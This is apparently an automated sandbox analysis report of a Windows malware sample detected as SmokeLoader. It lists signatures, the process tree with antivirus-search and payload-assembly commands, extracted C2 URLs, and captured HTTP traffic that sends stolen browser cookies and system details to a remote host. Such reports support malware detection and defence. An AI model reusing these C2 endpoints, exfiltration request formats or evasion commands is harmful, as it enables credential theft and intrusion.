Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1473147
MD5:	1aae19c81605bf0a5851e42e3574a83c
SHA1:	ba91bcc371d24ba57458ba4a2aa82bc83447a129
SHA256:	7c7cded8d1c0784881859ed03340d81c24ea9bf5d9972963cedf0e40b9856a0c
Tags:	exe
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to steal Chrome passwords or cookies

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Drops PE files with a suspicious file extension

Found stalling execution ending in API Sleep call

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Leaks process information

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries Google from non browser process on port 80

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Copy From or To System Directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 4764 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1AAE19C81605BF0A5851E42E3574A83C)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

9CFE.exe (PID: 5812 cmdline: C:\Users\user\AppData\Local\Temp\9CFE.exe MD5: C71D322F4A1D526CC0E5B3E010C184BE)

cmd.exe (PID: 6396 cmdline: "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3784 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5808 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 4432 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4764 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 4180 cmdline: cmd /c md 78801 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 6676 cmdline: findstr /V "rapidconfidentialityspokedrill" Thanks MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3496 cmdline: cmd /c copy /b Thanksgiving + Arnold + Daily + Mobiles + Drugs + Log + Shoes + Bd + Representations + Investment + Explore + Submissions + Bosnia + Closing + Supervisors 78801\B MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Later.pif (PID: 2820 cmdline: 78801\Later.pif 78801\B MD5: B06E67F9767E5023892D9698703AD098)

timeout.exe (PID: 2508 cmdline: timeout 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

Later.pif (PID: 6584 cmdline: C:\Users\user\AppData\Local\Temp\78801\Later.pif MD5: B06E67F9767E5023892D9698703AD098)

wjshsfa (PID: 4500 cmdline: C:\Users\user\AppData\Roaming\wjshsfa MD5: 1AAE19C81605BF0A5851E42E3574A83C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x719e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x1127f0:$string1: SELECT origin_url, username_value, password_value FROM logins 0x11b3fc:$string2: API call with %s database connection pointer 0x11bf50:$string3: os_win.c:%d: (%lu) %s(%s) - %s
00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x706e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.2.Later.pif.1400000.1.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x1127f0:$string1: SELECT origin_url, username_value, password_value FROM logins 0x11b3fc:$string2: API call with %s database connection pointer 0x11bf50:$string3: os_win.c:%d: (%lu) %s(%s) - %s
19.2.Later.pif.1400000.1.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x1117f0:$string1: SELECT origin_url, username_value, password_value FROM logins 0x11a3fc:$string2: API call with %s database connection pointer 0x11af50:$string3: os_win.c:%d: (%lu) %s(%s) - %s

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wjshsfa, CommandLine: C:\Users\user\AppData\Roaming\wjshsfa, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wjshsfa, NewProcessName: C:\Users\user\AppData\Roaming\wjshsfa, OriginalFileName: C:\Users\user\AppData\Roaming\wjshsfa, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\wjshsfa, ProcessId: 4500, ProcessName: wjshsfa

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\9CFE.exe, ParentImage: C:\Users\user\AppData\Local\Temp\9CFE.exe, ParentProcessId: 5812, ParentProcessName: 9CFE.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit, ProcessId: 6396, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6396, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 4764, ProcessName: findstr.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://gebeus.ru/tmp/index.php	Avira URL Cloud: Label: malware
Source: https://mussangroup.com/wp-content/images/pic1.jpg	Avira URL Cloud: Label: malware
Source: http://cx5519.com/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://office-techs.biz/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://evilos.cc/tmp/index.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\wjshsfa

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\wjshsfa

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01412D70 __Xtime_get_ticks,omp_get_thread_num,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,BCryptOpenAlgorithmProvider,GetLastError,BCryptSetProperty,GetLastError,BCryptGenerateSymmetricKey,GetLastError,BCryptDecrypt,CryptUnprotectData,SetFileAttributesA,DeleteFileA,	19_2_01412D70
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01415030 __Xtime_get_ticks,omp_get_thread_num,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CopyFileA,GetFileAttributesA,__Xtime_get_ticks,omp_get_thread_num,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CopyFileA,BCryptOpenAlgorithmProvider,GetLastError,BCryptSetProperty,GetLastError,BCryptGenerateSymmetricKey,GetLastError,BCryptDecrypt,CryptUnprotectData,SetFileAttributesA,DeleteFileA,	19_2_01415030
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014113C0 CryptUnprotectData,	19_2_014113C0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01411760 __Xtime_get_ticks,omp_get_thread_num,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CopyFileA,BCryptOpenAlgorithmProvider,GetLastError,BCryptSetProperty,GetLastError,BCryptGenerateSymmetricKey,GetLastError,BCryptDecrypt,CryptUnprotectData,SetFileAttributesA,DeleteFileA,	19_2_01411760

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:49727 version: TLS 1.2

Source:	Binary string: N:\Programming\Visual Studio repos\MainBeast++\MainBeast++\Release\MainBeast++.pdb+ source: Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: N:\Programming\Visual Studio repos\MainBeast++\MainBeast++\Release\MainBeast++.pdb source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: 7_2_004062D5 FindFirstFileW,FindClose,	7_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: 7_2_00402E18 FindFirstFileW,	7_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: 7_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C5C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_00C5C16C
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C547B7 GetFileAttributesW,FindFirstFileW,FindClose,	19_2_00C547B7
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C5CB81 FindFirstFileW,FindClose,	19_2_00C5CB81
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C5CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_00C5CC0C
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C5F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_00C5F445
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C5F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_00C5F5A2
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C53B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00C53B4F
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C53E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00C53E72
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01410730 FindFirstFileW,FindClose,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,	19_2_01410730
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01410810 FindNextFileW,FindClose,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,	19_2_01410810
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014FB7D0 _vcomp_for_static_simple_init,GetFileAttributesA,_vcomp_for_static_end,_vcomp_for_static_simple_init,GetFileAttributesA,FindFirstFileW,CreateFileA,GetFileSize,ReadFile,CloseHandle,FindNextFileW,FindClose,_vcomp_for_static_end,	19_2_014FB7D0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014F2001 FindFirstFileExW,	19_2_014F2001

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.221.157.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 58.151.148.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 127.0.0.127 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 186.101.193.110 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://evilos.cc/tmp/index.php
Source: Malware configuration extractor	URLs: http://gebeus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://office-techs.biz/tmp/index.php
Source: Malware configuration extractor	URLs: http://cx5519.com/tmp/index.php

Queries Google from non browser process on port 80

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

HTTP traffic: POST /sendcookies HTTP/1.1 Content-Type: application/octet-stream Host: 46.246.96.149 Content-Length: 368 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3c 41 4e 44 3e 6c 6f 67 3d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 46 61 6c 73 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 39 37 38 09 31 50 5f 4a 41 52 09 32 30 32 33 2d 31 30 2d 30 34 2d 31 33 0d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 72 75 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 32 36 39 09 4e 49 44 09 35 31 31 3d 45 66 35 76 50 46 47 77 2d 4d 5a 59 6f 35 68 77 65 2d 30 54 68 41 56 73 6c 62 78 62 6d 76 64 56 5a 77 63 48 6e 71 56 7a 57 48 41 55 31 34 76 35 33 4d 4e 31 56 76 77 76 51 71 38 62 61 59 66 67 32 2d 49 41 74 71 5a 42 56 35 4e 4f 4c 35 72 76 6a 32 4e 57 49 71 72 7a 33 37 37 55 68 4c 64 48 74 4f 67 45 2d 74 4a 61 42 6c 55 42 59 4a 45 68 75 47 73 51 64 71 6e 69 33 6f 54 4a 67 30 62 72 71 76 31 64 6a 64 69 4c 4a 79 76 54 53 55 68 64 4b 2d 63 35 4a 57 61 64 43 53 73 55 4c 50 4c 7a 68 53 78 2d 46 2d 36 77 4f 67 34 0d 3c 41 4e 44 3e 63 6f 75 6e 74 3d 32 Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>name=Google Chrome<AND>log=.google.comFalse/True12404279781P_JAR2023-10-04-13.google.comTrue/True1240427269NID511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4<AND>count=2

Source: global traffic	HTTP traffic detected: POST /connect HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 61Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 76 65 72 73 69 6f 6e 3d 74 65 73 74 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&version=test
Source: global traffic	HTTP traffic detected: POST /osinfo HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 316Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6f 73 3d 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 36 34 2d 62 69 74 26 6c 61 6e 67 3d 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 26 6c 61 6e 67 73 3d 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3b 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3b 20 26 6e 61 6d 65 3d 68 61 72 64 7a 26 61 64 6d 69 6e 3d 46 61 6c 73 65 26 63 70 75 3d 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 34 20 43 6f 72 65 73 26 73 69 7a 65 78 3d 31 32 38 30 26 73 69 7a 65 79 3d 31 30 32 34 26 72 61 6d 3d 34 32 39 33 39 37 31 39 36 38 26 76 69 64 65 6f 3d 55 45 58 38 37 20 7c 20 52 41 4d 3a 20 31 30 37 33 37 34 31 38 32 34 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&os=Microsoft Windows 10 Pro 64-bit&lang=English (United Kingdom)&langs=English (United Kingdom); English (United Kingdom); &name=hardz&admin=False&cpu=Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 4 Cores&sizex=1280&sizey=1024&ram=4293971968&video=UEX87 \| RAM: 1073741824
Source: global traffic	HTTP traffic detected: POST /defenders HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 72Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Windows Defender
Source: global traffic	HTTP traffic detected: POST /browsers HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 211Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 4d 6f 7a 69 6c 6c 61 20 46 69 72 65 66 6f 78 20 7c 20 76 65 72 2e 20 31 31 38 2e 30 2e 31 2e 38 36 37 30 3b 0d 0a 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 20 7c 20 76 65 72 2e 20 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 3b 0d 0a 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 7c 20 76 65 72 2e 20 31 31 2e 30 2e 31 39 30 34 31 2e 31 35 36 36 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 7c 20 76 65 72 2e 20 31 31 37 2e 30 2e 32 30 34 35 2e 34 37 3b 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Mozilla Firefox \| ver. 118.0.1.8670;Google Chrome \| ver. 117.0.5938.132;Internet Explorer \| ver. 11.0.19041.1566;Microsoft Edge \| ver. 117.0.2045.47;
Source: global traffic	HTTP traffic detected: POST /softwares HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 303Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 55 70 64 61 74 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 57 65 62 56 69 65 77 32 20 52 75 6e 74 69 6d 65 3b 0d 0a 4a 61 76 61 20 41 75 74 6f 20 55 70 64 61 74 65 72 3b 0d 0a 4a 61 76 61 20 38 20 55 70 64 61 74 65 20 33 38 31 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 35 2d 32 30 32 32 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 36 34 29 20 2d 20 31 34 2e 33 36 2e 33 32 35 33 32 3b 0d 0a 4f 66 66 69 63 65 20 31 36 20 43 6c 69 63 6b 2d 74 6f 2d 52 75 6e 20 45 78 74 65 6e 73 69 62 69 6c 69 74 79 20 43 6f 6d 70 6f 6e 65 6e 74 3b 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Google Chrome;Microsoft Edge;Microsoft Edge Update;Microsoft Edge WebView2 Runtime;Java Auto Updater;Java 8 Update 381;Microsoft Visual C++ 2015-2022 Redistributable 